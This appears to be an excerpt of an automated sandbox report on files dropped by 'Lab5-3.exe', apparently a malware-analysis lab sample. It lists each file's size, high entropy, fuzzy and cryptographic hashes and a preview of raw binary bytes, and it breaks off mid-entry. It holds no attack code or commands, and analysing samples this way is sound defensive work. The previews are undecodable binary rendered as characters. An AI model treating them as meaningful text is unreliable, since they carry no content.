                                                                                                          Preview:>..........[kM..Wr.{..`v..B...#... ..].{..}.M....n.....Q........N.-..."E....C%Oj^....m.>j0.+.h.v.r7@......3.iQ[.........=_.....(..8.?...U)..Ge..r...V....j..E..a{RO..h/...'..PM........C3........ pc..f.~XR...I7..9..ruJ"....p.0>..y.d ...x..O.[ZS.z.....PMmQ."./...o7.O]L..e&N=...:MA..pRp.g.....S...[.J...:S.E.....@g05..B..:...K:~J.;...........F..Ma....nu.PX}...D...U.K._l...M..I.A'5.........+..ra{.e.....|...Z'.E.....eD...s..%nYs...X..d...j..G....L.0+.*.....y..`....;.D.n.+w......kNKa.U....k.}..L..S...J.,....0e..)*.X....;...:......\....xm.F.i..X........W.\..M....!._X.{..&?..2.'.)%....s.7...l.....:.....].ia....1z|.......<J'...e++/.F.v .>...O.?.v.=...0..)...].K...T...|.+.K....v|..U.A..5..W.A.Ek,..I.c.9..l...THX....-.....p*.......[.h.%U.s....@.ar.1.!.|^._....!.....w.I.\..C.2u..C$........:.N...D#@.s1.t.......D8.....J.Cc.,.w'T,.V.P.~/0..b......5..~....IJ......?...:.g4,n.;..F.P[<v...F.S.......3...X".....[i0......C../..]PFy..L..G2.*..n...].;
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.942883153614616
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:YibzlSNCYiWQYlOBOJ8YGcXKoe9xb4fgHfUTid3hBaUoSGFcmeykEdEElU92i:B5SNCPWQYrGcXKtbanGx0uKeY2ElUJ
                                                                                                          MD5:141F1C979D54F69C6B2ABB82096E46B6
                                                                                                          SHA1:8485C2756594797A7FE25F88288D730FDF243D2A
                                                                                                          SHA-256:F7F47D85B0C26D32ABA4A83278001E4AE310930D754BE1561D4CB05E28E55BC3
                                                                                                          SHA-512:966A4CDDD94A62CA963D9079654EA051705423231DC336E560C58D66C1699A79C6EEF10750EF2CC7E9C87C3A4EDAB34A507F8554F39C76C061194F6D5E36ABD0
                                                                                                          Malicious:false
                                                                                                          Preview:...@..vz....M..-=..=....I..[v......=y.X....sf@.........8.hF:.=....e.M....a5.a..:5.C}f ......9..x.I.7.....V........p....U...s..R..b.."Q....P..#..G*Gu.X..Jd...^|..#gD.UF.;.......(D.}N.."F{.^>N_`.IuLE..:.$Q.....[.:9;.d..c.)\..b....C...S=.T...P-...n)..............`.;..Jd...Z1....Z..(.[...`....L.zMq.>..Ox.B.......S:B3.....O>....k.&"5.....e..c...........n^.~..._..l;eeV.z.....$...k....w4.....W..ZA..<.W..7......f..)..n.#.>X..]4N.{]g^....Z.YpB8DI..{.......>..c....H._..\}E..D3j.)._I?>.+.......Z.[.L......ts.......E..h.HX.....`]3.3.T1.HCp..,V...+....J....*.../`....v....`.u..:.P..x..../..v.......e...3..P.Z..M..$.R.~@.....fO........|......M.....mS.|/+..[U....-{..7..RM.....wT...B.Jkg.HG......%.....3.D..g......h....U...5&....A?...w..8.q.MT...<.C~..e...3.....9.<.<&.3.XFx%..w.C ....nz.-ws...*0S.)..n6.'.33..}=.......'.rs/..T..k;....{..7.h...#.....CS..W.i...([.`!.B..qr8.....v+.K(.q..F...T.%.7.....D..t....a...A+....a.z.h.7...B'.8.*l/<.9v.$..##L
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.926302624940409
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:xzqHbJsW49rZesnoj7KF1xu+mHfUTid3hBaUoSGFcmeykEdEElU92i:xUGpoi4IGx0uKeY2ElUJ
                                                                                                          MD5:AE0F580FAF1EFC8CA4E805CF0585C5BE
                                                                                                          SHA1:5915F21BA28D5F786B71A0BDB17C99AE02379B9A
                                                                                                          SHA-256:991AF4F7F595EA46AF55BBE78E683E046774FD4B85FF86A3659D3FBF4B1EADF2
                                                                                                          SHA-512:FF0B50CD15C5BF79B0FCEF7D19E9F68C7E6E776FDB2DE198F68F99797DC0E8F1241529D39FD52DD8A02878369FF58E5A5BD493EB46C01D4EF1F4C3D487A500BC
                                                                                                          Malicious:false
                                                                                                          Preview:..sT....p...Q..J}.k.Tt.p.Un..<}........Az."d..1.q.6J......>.o.cH@..KM.o.~.4..~...O.0..Gp.tp4................,......Y..~.Bn...D.#.JG.FXv.gg....I.{......ax....IM....8...TT.F...QB.....E..vtrA.6..!.D-.SN....n.....t..g.Zo....k....B...3n..&..*.A.....m.A.L......1.s.l.(....tw.^n..~.y.:.yR...>....!..".u\.yA..4./..>.a..gk8^...(9.0.m.6..G.`....!!....8.N.....++...=.*..,....o4N.Z*;....!A...+.\. .....,|.f..vK@|..=.....!D...~...:..4...L.i9(....+4.... .J.9..%.N...)O3.$.........a...(.5..6..Lit.D .Z......./Ol....b(7Em..>...vu..>L.oR[...K+..L=.....,..x...[S..bNP[.|~.0{..q...4.`!../.D....S..9..1.>]..3..<.=.nB.,u.....E........S.\..+.kd...vH........Zey.w].V...|...Ot..>.Xp...x...+......w}l..I.^f.]..!.R>..D.9.<.f.`G2:...X.u..`.u..".,VPr+O|.l....KRG.\.k.c..Tq..=.f./...W.r41:..N..%...W.p.....~.b.A.!....fn.l.!tE!.....2E....G.^.....A...J.]...oD%..i{.s.^...n....83.Gv....gN^X........ .~Hau..nb..3..jI.d...Q.^eU......)...)|g5>.m.7._..&&D.)r..X.>........S........s.....`..P.).."-./...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.927874374651308
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ty6Iqovak6T30Rfc4nJcSXUmTQMeR5DHfUTid3hBaUoSGFcmeykEdEElU92i:tnnik30RNc7mTQTzQGx0uKeY2ElUJ
                                                                                                          MD5:E4A3DFF9A4CCE9A830712DD67949BB11
                                                                                                          SHA1:07238A3BD8DB6F8B7D5B6D8CD4B7996499B00F74
                                                                                                          SHA-256:D254A7A411270F41848BC28C3274436C28AB4FDD655E610F4E0C35930BE4EBAE
                                                                                                          SHA-512:5774CAE5D53F3CD96B926C1DD731F02E4C946F3A56F8B0BE2260891A6B88C1D82BDFF0DCC2685627756E2D5677B079D88A2D5186FB5681E46A3BC532A61E765A
                                                                                                          Malicious:false
                                                                                                          Preview:.6..T.4Z.....5..R.oqv...D.."..%.5...Qj....j.....p.Y.VE.M...s/..V&^RY.h...e..b..G}>u.u!.l....)J1..HI..`.(..^.N.l&..*g...1*.y.G.d..DGsB)..C....o.'b.P.x.....x..F.LgS...x..L9...+.g........[...?..e.#;..'...V2..U.-.......SS.R.5..9Q...bC.. b.....(.5.$+."A.\b..A...c.e,K.Y.j...2ZE.W..x..9..E.1.M r.7.S.....3..4../Z....xP.f.....J..PX.._=j...g..........:....v.u......*w..\e....!c[.....G.&j.\!d....y.h..S3..7...{.3C..?.F..G- PSx..|/<.........:.r.KRh6.*,{ ._s..5.C:E.8...8...|X`.+.a.........%.%...TE.u........t..u.-...#k.Lh..1..K...C.. .D..W...sV5..'...........Y..X...|.V.T.... .......E.)......!..~...........(./...Ym.k.9.B.e.+.-f.P.U.l.Q.....+^&$.i...3.-.s..=.I....".E..%J.R....d.A.......2..p..v..o..K:.s...@..l...v...p...G....#W.}#&P..?.$v..m)]......{_..M.....z.F..h...F.zg.}exD..O.S..~3.T.[E..,"-.Y.........Wi...z...)..A...u.Y.mJSU7E.u.d.lH.mP=\dn..Q....Z.X.....K.|.(e...'A...O...-Um.Z....Z.uQp...*..[.""..S...=*y.d.<.oAY....*....v4.......|.R..."k....5.. ..U..........[p
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.94102798187789
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hD2F46dzJX6/p7vgssKu2O3G3QrXGoCI63sHfUTid3hBaUoSGFcmeykEdEElU92i:Z2FBK/prg/tFGoX2Gx0uKeY2ElUJ
                                                                                                          MD5:D0CDD51DAE108904196D2AA6D9C2382D
                                                                                                          SHA1:D03331F1E9836BC400C74A6B6F9B8446FC7498A9
                                                                                                          SHA-256:360F1FF3955D50B5746DF59E60C4C4CA2275E9A72593A2FA4273FB721611E120
                                                                                                          SHA-512:C35124398689D9E49F08F2E124D24568C89B55657675FEFD5D5D523C51CCA64DB77FF0A07F6DDC124E8CCF5EC008120176266294F9F320EA1B7AFAE333C8CD0F
                                                                                                          Malicious:false
                                                                                                          Preview:..O<~.H.p....P........:......p....G).X..:6A./c.....x.9.(.......Q..BSG.....E+......,/)1..i\4.E..4..S.r..7..|aGE.Yc..8.......RxM.#6x.Kz..I^.[.se..`bj..X..8i.ve.).Q...R..Nx.A...p.S.u..<.......y.'.2s..\(..........a.Vl._..0..qP}N...,....[..O[s. .yq.36.s....E..N.{.)%.2+.ze.vU.R..Mw.....".......'......YTF.B.~o...ZZ..J".....(...T.^....7....9$=^z*.ZYkt.V.GeG.Iz.{B.....y...L.......0.........I...{...J.....2sZ..v..^.;X...*....W...0W.I,.*.4.0HT$1...2'.Uz..1$.p....Zg..J.c......&1T0.6].*:.5.~.0.y.Yd.n<.!...Z......d...x...>."....\..On.k..f~.z........;.....!(U..Q.iV..r..p.o.........E....i5...5.+.l..L.2|.K~...A...A..+.m.'f=.kh.2...Gx......"&....d.36...>.`.....%.u.m..9..U..v....6.e)G.p......*..X.Z~X....}.."VM..D(...;.......-2yQ..9A.......+.`Q&..1.....Y '.......8.V....b........."..<...c.'.....?..m.*.d..N.t...C~I..hCz..0..Nf.....ev.7......Aji.S....z.:ia.5..l..|......m.(.c~z..^J.:...K>.4....I...a{j*.bRi.d..+M5.....V..MD.>./H&Dcr.....Yf;..L...}..x..e..J..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3520
                                                                                                          Entropy (8bit):7.945950182604724
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ygS0TPi1Gexjm1J466Z+SXK6wMYGx0uKeY2ElUJ:ygmGUAJ3Saq0Cb
                                                                                                          MD5:CCD406D0BCCD8A0522732EC6FCC01057
                                                                                                          SHA1:F59F62AA91F3D65D2CF59C95D9A69B6B8766E91A
                                                                                                          SHA-256:B9BCA4A8D508830306A3E2E60DD304A291C58C1FF7F04E4B5FA75B63051CD31C
                                                                                                          SHA-512:3A4883C386DDF5EA596B0717D110E18905C64FFAE6C6A95E724CA4673D040215A2AE61963610B851DEDF875BCBE7C72668910CECDBF43CF858544BEEA6EBADC6
                                                                                                          Malicious:false
                                                                                                          Preview:....E....g!3.O..{q!u....d..Q...B.m;....T................nN3..Mx"..\.(./.h=...i...v<.....C..|0.....P.|....qRY+A.1....n.}.. .W+c.j.@......G.s{..Q.O...g.....F...W...Wm.5f^.q..I.L>..rt?...=,.Ms.-(.h...$...]..f.......x.:....3..{..e.+cz...^7..l?..VOYzB..Y./...>@hQ.s.7D...z/.[ ........ .....v.........m.,.[(f....R.a.c...V.XC.W..;.e.......a..Sr..2..1".+w_=..T.o....AM..N.G..fx.(t........}.B\$.$..:*......z5..2.....o.2aO...3.e....\|..-d*....p...i....S....R..O.8..oo+&.M[`......tTJpC4qy+"..6I7.8..<.92~.wYl.....=..a...~........O......^...;...iv(.@.R.4....+.;V.#U5....5l]v......n.3.6..L..&...#-LA.o.)i<.h..M.c..@....].?.XB..\<..h.}+in]...g.)....\.?.1l.^V.......H..4.%....i......jU.Z..04.'I...Vx.J... .Q?n...Vb.G....-=..JI.\...D..#..j.>..r}i.G.......+..\J..2...cjh}.b.@...S.}.Tk.a.R.....8..&....>*2.:,.#.SNe#..vh.../pvT..C..2.;...../.7..bK.P3.Kp.@...m..K...I_.S'....(`.`R.....O\.....2._8.WE.}.@a..e..{.F.:0*?]....9`a9.G.....Q....r$....8.\V....&,.|:P*A.-...k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.925645809459816
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:C7YnXYG+ChEFBYXvBkSy9HfUTid3hBaUoSGFcmeykEdEElU92i:TaSyWGx0uKeY2ElUJ
                                                                                                          MD5:0292D35C6B5BE69EAD7E62C301404C14
                                                                                                          SHA1:EC89D2F660CDB833541F27B17B483B4F59B40736
                                                                                                          SHA-256:EEB55DE6A77A768E0FF36EF2601D9A66125E8611B6969FB2150D5AFE3A77BC1F
                                                                                                          SHA-512:56B306B92D32931DB9802EB7FD86CA451C4CC1FBBE0ECA6010A479145A5C124C8D77CA2F1C3782399963210F1D7376D063FFD36E98DC1FD2728C28C239DE20A4
                                                                                                          Malicious:false
                                                                                                          Preview:."w...x....Xy5).L?.p....!.K..f....H..n..\.2...7.q..~._.l...cx...4PSfO....(.)..A{.6.K<A....c..+.O..Y.{j..7W.V.0^...:.....sn ...mD...c.?..-..w..-.@s..J..f...\~QZ.....G..!{..m*.....}....*.]l.x...y.....L..L.....r.8...!U;...Zc.....y.;..t.}tT..}.2..csZkU.vVH*~A....MR5..Az.'....x..\..t..^! .......1..m8..n....A..=S.7J.....XU.w.......Uc..s=.9.......PB.'.(&._Y.n...G+9..3.....g.C.tS...O...]....h....7|..b..#kL...;......;.[8...<..M....Ax..Gr+rj....n.._m`....W..[.D.`......E..G......,...H'.."...fX.|(.N.!.....W=...<.|....J4.Fr..R1......q~-.....0?J..,.@....h.....Z.G) }|^Gf...g.G&...9.i.8.._.h.z.G.g.....cY....i.D.u/.....<......8...:......bc....a.....g..j.E......._..'.z.....RD.q...[FXT.pY..nA.{t.k. Y...q.N.4( .o..Q.e/..Z........&1..#..!..@.._X..lOf~.C.{...}Jos...d9..n.T.h......s+.'.'.G.17A`.VOO..upu.L..u..w...O-\...).(.....F{.AIM.R...T....5J.OFn..~.8^.5.X..*k.:.xikzd{...U.Q.....M...4h...u.....F._. ...... ....".<....d.>D..%...1_7.&...l.......c[G.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3152
                                                                                                          Entropy (8bit):7.946388227767451
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:hv+sIeSxFxARF90IXNmv2XGx0uKeY2ElUJ:5+1/rAf+IIvD0Cb
                                                                                                          MD5:52C9AEA99CD67FF28AA7900BA7E10DA9
                                                                                                          SHA1:2E5D344535D2C38C056F25ABC8D9D4570E4E237A
                                                                                                          SHA-256:6D6A40B6FB56C24A1E936AAEA10668F7A1AC2DBA14600C5B6FD0E81F008F4707
                                                                                                          SHA-512:75C2F6BB21358DF1FD7F80AAA349A6AAE04ABE88D4E74238EBA5D17A5DB573909DD47F17D14A31065AA635B6407FB253D6E4B84D3B2073FE0F0F62411BB53D94
                                                                                                          Malicious:false
                                                                                                          Preview:...O...Z.:v..'B..]!......pD.N..v..j.:....[.ER....&V.....(..#w...........F.. .;.0..a,F.*...d...HP.,D#]..Lw!...M...|U......a.{..B..U/t.....*.......L....=....Z.3/.A...x.[.j.)......'T....|k$.....R^;.s..Wq......CI..0.+8<..-T&.&Y@.. .#.......ma3...xu.T@.)<.)L..*..j'+.....[...7....!X.ytj...O..:.m...85..1{.8..%h.<@...N.g...M..X8...S.s:.2.~...i&..+...o.X.j.=.I.*.D_..%..r"3.....A......C..s....*..L...O.~(...J.a..@rQ...a.|.1.0m.>!.q"Z.N....~O....#...Z..WEy...'..u...p.]F......W......8...6].........g..!..r...R..N_.D.@..7S}..U..+.18UF>..X.....G..~.-A...^..1|.-.zi../o....QO..T..b.K.(.,.s..)....7H.wc".}*.@..8.Y.75h:y%....{O..@zhjp.o.Q....2)W.1.J.W.....OFYVR._.V0`...x....U..._1...~(d..h..m....!^.q).%....X&..j....}0.j.d.qP..j...'.O...L..M..s...Xut...8.......(}z...q.@\....[.....7......=e.......oi....1.v2u[e.W...O2..&...V4\%{......=../.~u....S.7V......5=...-.,...Pfl.0..OH..x.M.d......d.b....N8..WE...^.=..Q..T..C...&BE.......P.wv...P..n.U.J%....i.?....).)
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.909246822572905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SDj7Uh4j3/u/JreHfUTid3hBaUoSGFcmeykEdEElU92i:S7FjPg7Gx0uKeY2ElUJ
                                                                                                          MD5:1AA89827618395A7D559AFB98908FDB0
                                                                                                          SHA1:89CEAAD07DF09963E7FF6402853FAA1A621A40FA
                                                                                                          SHA-256:09B17B97A65CCFA9B825F2D958A23A7605E00E383053999B96E5BCF0AB30013E
                                                                                                          SHA-512:273E7F9020CAA7E96AB77ED89FE1AC54CEC26E56D213842EF7B43022A8E3DD619CF6BF6D4043E23F5A1C78904704370D9F6F6B9A90EEA8F930B97F9AFCD96B20
                                                                                                          Malicious:false
                                                                                                          Preview:.........Z.........B.|...t...3..r..sn.6./..'.%M...z....L.&Y...c....a96.#.l.@ykJ(...y.U1v6X0.....a:w.mG.R....g.T.C.c.;....$I).....O...Z..pY/R....?*.Q.M.....O....?FTa.}.OAg.*M[e......ty....O.. ...Sm.07..u..U.J....:.........U.1.$.....'......&u......'..[;.......G$t..Ca..0|..u..cz........~..}..x.J......VB...v.a......5j.N....w.V......$..m.V9$F.M.....>...6...-..an..m...(s.Fa....}.U..rJ.....}...T.......q}..00....i9f%.Z.L....I.7u......,.Ku./]...Lv]~..0.3.w..#..9.B.J.P.)8WH........Acvk\....$%...(...=/.X._r2.,(.wfX.~h..S....P..Nz....t..c..j..Z.."..8../.{.~._XB:....$.:.Ff.T...6...;8...>.cg+C..u.,.<.z.H.2a...-./.....s.).J.B.r....k.D....U...6._..u....Ci<.."..u<.9..T..3....m.r.\.F-j..."...In.0....hQ.......w....Y..B....^E...5...V..8...#xY......=.....|8<"..9....-.^...@G..*v....^...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.90537371556893
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:I5cKuXG3s385wCHfUTid3hBaUoSGFcmeykEdEElU92i:Ec1z9Gx0uKeY2ElUJ
                                                                                                          MD5:71296B5FA7A534FF1DCE13DE90A35DAD
                                                                                                          SHA1:F260841AF587B0C3217CAD82F8619FB9C9F9AFCE
                                                                                                          SHA-256:E4ECB9E209715A37760DC4951BE89AC173291D8D8A2527F721349EBCE2B71EB6
                                                                                                          SHA-512:194CA9DE0940A8479EDD607CC573087FDA1460733A635EB746D1125383BBF96397AE0B9C7C21AA94B6268827547706B2F041054A6F9E2A3252CB87DD4D02C9FF
                                                                                                          Malicious:false
                                                                                                          Preview:....~g.Y.8....^Jt#....T..LGS...0H.E.....z...0.x'.Z...#)6.{)...?i.$.c~Z....a.A.m.5/...+..|&.......x.i"..H@.#0;........k..:g=...)..(.kq..%8i+..TW."......[.`.....o^.)/..,@...>a.....q..ok...t./V...?.Y...hB...(.%@...@..........(....a.@...fc.t..7...0...5..;.)e,..\eqT.l..sB.v.^v.2w@........2.O...-8...z.T.)).J.......A."g...`...z..2..`..g....%....f..|.V.\.^.4..8r.d........zw.-sC.-N?-.....{c2.W.*...Y..XQ..%~..o.L..S..M........1?..5.f.....|<.....p....q$.c.IV...'..`P..bB...v.T.k..?...#*{2.e...+"..+............;......kpL.*.KF....a.T.I..x....J..?..N..5.O"D...E.2....:4..Ifk..@.-...%.YD..k.N.Xs..*...>...)I.."|.3...w"..=VZn.fc:.q./..d.C.G...V.4.2g..W)A(.,..W...........3..c.....?..n...W...@.rf.M5.&...2`o.6...N.{.0.bsi....r#Q.....uw.......b=V....x.TLX.['.c..t..p..S.&..Q.BN.../ze..Cbo.t?Ee.>#....\[..ok._]...@....H@c..........NHl.q....0U..OD.d.;.yML..r....-...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.936197293023221
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SDmvri8w90MOZuCc3OIQfMY/gHfUTid3hBaUoSGFcmeykEdEElU92i:8mDiT2MOB3IQfMMGx0uKeY2ElUJ
                                                                                                          MD5:8F8F54D274A2A99CD6E9ECFE320A5C3B
                                                                                                          SHA1:3703409C315DA1DBF43F8E5864909ACA30C0EAD1
                                                                                                          SHA-256:6763A5997030AC164CFC93A6AC0017FE183E15A1B8EE8822E47F12B806C350BB
                                                                                                          SHA-512:423A9AAF65A93937D3E766E2D6B27D8C33D80BAC89F8250D1C9C1EC55AEFC674E4F9CEF8E2234C98223E5DA269188AE63047A632779898617E23954B7CF6DFB0
                                                                                                          Malicious:false
                                                                                                          Preview:T..(.eAn %.5=.......w9...2....E..6b?...J<-PvD..-...X.._I.Z....eD...|....J.......<.O...'._..eQ...P.......`v"p.2...V\..E..E.0kT.R4..........\...O..1Z.^5.k..Sv...t.X...E....Z..zS.....k.i[.i..V.U8~.O.....>"...B.V...5.z...J.....#R.%.3Ix4g..|.F.L..~.l].......W....6......F.n.6...h].jo.%.).[|.[..1H.,...-...IyY<.6....!....0.*..?z...@.I.RU?C..k..m{.OU%.S.i....m>...."...W.s,...kg...aXY.*......>..tz"1.....>.....V........).es..?.w..d.zK..{<j.$c..&O...v...'.T...Z..2..m-.?{6V.x.>.G.....]#..+.X..;..P:...B.g..x.......8........54.......'a..Pz@..+......4...T.......vW;..m..$....h..8.....aJ.....IjxL ....i....o.Og..g.T`.`.../.%#s..k.....Q1...[1j.:T-h...PB1.Dq<*.....H.~.Z!b.^.UQ7..#....x.|4G.{t.-.Cq..'u.g...r.....D@w].%r..[L..$.BD..d.E..s..*D..b...D.Z3..G...b...~r.@/[&,.u4&...........Wn..........i"r.x..>l..i...M..k....f........G.....KY.4.....b..j..9%b.....Ab........=.W..[.T.5...v.>.....1x.P...U...61<..w#m`S...{...X.QOy..<..W...M..Z.Zz....f.@d.K.!.3..-.;..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2192
                                                                                                          Entropy (8bit):7.918079881985358
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QltnNpnoHLsbgK4apNz39M3DBhyjmHfUTid3hBaUoSGFcmeykEdEElU92i:6Nt5bgK4aWzvyj5Gx0uKeY2ElUJ
                                                                                                          MD5:D27EEFA6BAC348150250463A702D8AF7
                                                                                                          SHA1:536D44235A7DD02D085B28CE84F7054F25301E16
                                                                                                          SHA-256:DC24BCA4FF6BD09CEAF2FB23ADE598CCC1D1BD5B5D76E6E71EFD49B75EA34918
                                                                                                          SHA-512:E5FDA175A7CE99533703CD74C17105CF4BD31C615428409094790B583C874B1CD1140AF87BB45DA63880103B2736B77832F7E1A313F19CC39AF2BFCB15FD02DB
                                                                                                          Malicious:false
                                                                                                          Preview:D(..C.M.{g!.@..=g6wR..HM7..>x.2G.r...s.$H............o.....l..m..g..n...D.......i.'....2...s+.{.J.sl......A......L..9.c.....u...3...Y...w..:.zT.V.#.,T'v.v..2,.;..2..jy.x.B..jF2f.....0.6...G9.B..*q.A,..Rj..5 ;jaV..#.R.....f..O.L..t.....c..LP7..f..fXv...2_\L....L.g......o..|.b.;. ..$.:Cp<..T.X..JVhDF..j.\.RX...zaM0.....Ww]...R.n'A..v.....,....H....T..#md.(E<8...{.....`......$1-..`.......q...b../.-<....*....sa....@..]>...L..D.LV_B...vi..8..2u...@^A{.8....\Z.)..-.}.<.}."g...9.4)......#1~.....a.7N*....P...sY.... .t4.....7-...j...?....(.{W?{.z...eF.....m.........V.....=.\....M].A.9.....K................<..03.m..z.....u.L..{4...p...."...3h.3.]......<.Rt..Z.S..Y3...x.D9"h..0Pq.....c...Ga.]S'.O..nz..Oc.U.I5&._.j.....HN.d..p_tm..&.|P....b.SD...p..q\fD.8.y...#`......4.'(.\.Hb.....L..)Ka3.u:...o|.X,).*.k..ixY.#..f..}U...q..PId....{....s......`..3.......f..Z6..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.937473202458361
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TuL1wu/XZTfWmV4l+zejWiwqoG1ZHfUTid3hBaUoSGFcmeykEdEElU92i:TroXZTjVSVwxGsGx0uKeY2ElUJ
                                                                                                          MD5:F337857C49499C51D5082576CFA5A1CF
                                                                                                          SHA1:6E1CA01000B9E0A8D1CC9A46DCBB810D0A11BABD
                                                                                                          SHA-256:E984C0946F76EC707616CC33C244087AD95A03AF5194B76C2BB8119BAC1FE210
                                                                                                          SHA-512:79475BF074D38E677CB6EBAFEC4C9CA2A4893C7D94B8B0C42E364263512D2FDECE95E6D44D23C337E2EDF9B058C28642EB441D3CA6ECF9A4F322FA25EED2D706
                                                                                                          Malicious:false
                                                                                                          Preview:....u..12@.......][......A....S..T.q.....x..Of......E.....v....j...DE.{2.?...,.f~[..>.#X.$O..@R0!W...}E;~..|...J..{c2......D..JP.7..5..K~ ..I.PY.)..w4....h{.YEx...1...W`-`;...9...W6......!#...)m.....<......-.]|.!$..;.".9@.`1....5.@h..+..I.k.....Um>Z....2....f.....d....%..T...<..H6...r`..1".G,\..(...y........N4..h.L.....<g.U....c..w/.$.>..ac`.Y....=UUw.D.Q.k.Y.KV..e^.....D.?#...k.7.T...z.g:.".U...U.c.S[.u.m#.=.|...-...^.Kb...L$.f../...FV..$.>'.a5.z..4..Q...F.N..&2e.W.......i%.5..W...p..o..+}v4..]..B.B.........5y.\.N9..vc.?....!K...`..A.....A.17.:.W.^E..WN..V..U.7..(j....&8..MDZ..V...D...T.[OKq..L...2KX.-.b..Gx..X....F...O......x.e'.pQ.U|.P,.A..O....=\.q..Hp[{...1.....c.......Pt..l.............h%...,.9.B|.'.%$~dz....TM.Q...qa.b.y.2..M.D..q.j.....!V.?~.6}X.m.R...`..`...0..Jx.q......D^.=+.!...scK.a.......~2=vrR..{.CI.8_....{du7..b...~.7..l.|$.|..:\.M.jz..R..u....>..:.7%tP.l.Nk....+...Y.....e...r.._vP....2......E...~........:......k2Q.e!.. vN
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2016
                                                                                                          Entropy (8bit):7.916512886274996
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JmJVfEnunhGW5gXHfUTid3hBaUoSGFcmeykEdEElU92i:JvnQUW5g8Gx0uKeY2ElUJ
                                                                                                          MD5:85DB50BF323455621BAB5C41790F35DA
                                                                                                          SHA1:6933BB2DAAF3CE3D11ED080CB845B0AC5931E171
                                                                                                          SHA-256:38030AD1AE3F76D2C2F2F54922D766E2A74875E98BD0F4771848E4D5571C6BD8
                                                                                                          SHA-512:9337DF6E495AAC42112223F883E719AB65BFB842DF3A61DB5DE95B7F3D0B85B963310B5FBAF64C7D0A9C68F99D93812F641AD8AD4F3919EDC2F2930BFEE6C2DA
                                                                                                          Malicious:false
                                                                                                          Preview:'tmwUF.?.)UO.@!.....wy.T`...E......neE.G...*.j_[...S@%....gi.............x.....)...C...v8...C..2.p3'Sm.3.M].\....{..0.Uh....`..E...p3+....?S.R..[..'...J......_.....u.>5.........V..[L..{!j&X..........!..i..+.p.@...[..D... 6.......R."h.u..BC.VF(b..7.{ ......v..q?m6@.m..$..Af"..M..G.N/y>.........#.5E.Y...xK...%......+..~2.$.,a*..a..3....r..Y.......K**...~F......M...c..G...-\l.8..)Nl.()...S..f.M.....<-..4N.[z..8!.<..n.'.W.`*.5"...qw7F...%^mM.......kS0IL.....=....../...h....Ld..#3...`Lw..zY.....y....9.{.&....4&s-.}..].Tx.j.R.&..^.Ln0.....xo|!! V5f9.c.r.....ru.......+~.T...b.../?......0....."...Z...a..XT..n.D..nB...nk..=..).ix2e.l..a.........ZIyi..'...y......4....G...c.w.DE.m......aUl+D..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.917881972799958
                                                                                                          Encrypted:false
